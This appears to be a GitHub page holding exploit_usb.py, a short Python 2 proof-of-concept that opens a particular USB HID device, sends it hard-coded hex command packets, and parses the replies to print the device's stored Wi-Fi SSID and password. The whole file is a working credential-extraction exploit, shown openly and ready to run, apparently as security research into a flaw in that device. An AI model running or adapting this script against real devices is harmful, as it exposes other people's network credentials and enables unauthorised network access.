-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit_usb.py
97 lines (77 loc) · 2.61 KB
/
exploit_usb.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
import hid
import time
import numpy as np
import array
c1_string = "010055060002000AFF38B70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_c1 = c1_string.decode("hex")
c1 = array.array('B', hex_c1)
c2_string = "01005507003F0000000101B800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_c2 = c2_string.decode("hex")
c2 = array.array('B', hex_c2)
ca_string = "01005506000200140042A20000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_ca = ca_string.decode("hex")
ca = array.array('B', hex_ca)
cb_string = "0100550C0043000B00012000020000077C0000000000000000000000000000000000000000000000000000000000000000000000000000000000"
hex_cb = cb_string.decode("hex")
cb = array.array('B', hex_cb)
try:
print "Opening device"
h = hid.device(0x25da, 0x0001)
print "Manufacturer: %s" % h.get_manufacturer_string()
print "Product: %s" % h.get_product_string()
print "Serial No: %s" % h.get_serial_number_string()
for k in range(2):
d = h.read(58)
time.sleep(0.05)
h.write(c1)
h.write(c2)
for k in range(1):
d = h.read(58)
time.sleep(0.05)
h.write(ca)
h.write(cb)
d = h.read(58)
time.sleep(0.05)
ssid = []
password = []
# here there is the SSID
d = h.read(58)
if d:
np.set_printoptions(formatter={'int': lambda x: hex(int(x))})
a = np.array(d)
offset = 14
while (a[offset] != 0) and (offset < 57):
ssid.append(a[offset])
offset = offset + 1
while (a[offset] == 0) and (offset < 57):
offset = offset + 1
if offset < 58:
password.append(a[offset])
while (a[offset] != 0) and (offset < 57):
password.append(a[offset])
offset = offset + 1
password.append(a[offset])
time.sleep(0.05)
# here there is the password
d = h.read(58)
if d:
np.set_printoptions(formatter={'int': lambda x: hex(int(x))})
a = np.array(d)
offset = 2
while (a[offset] != 0) and (offset < 57):
password.append(a[offset])
offset = offset + 1
time.sleep(0.05)
print "*" * 30
print "ssid: " + ''.join(chr(i) for i in ssid)
print "password: " + ''.join(chr(i) for i in password)
print "*" * 30
d = h.read(58)
time.sleep(0.05)
print "Closing device"
h.close()
except IOError, ex:
print ex
print "You probably don't have the hard coded test hid."
print "Update the hid.device and try again."
print "Done"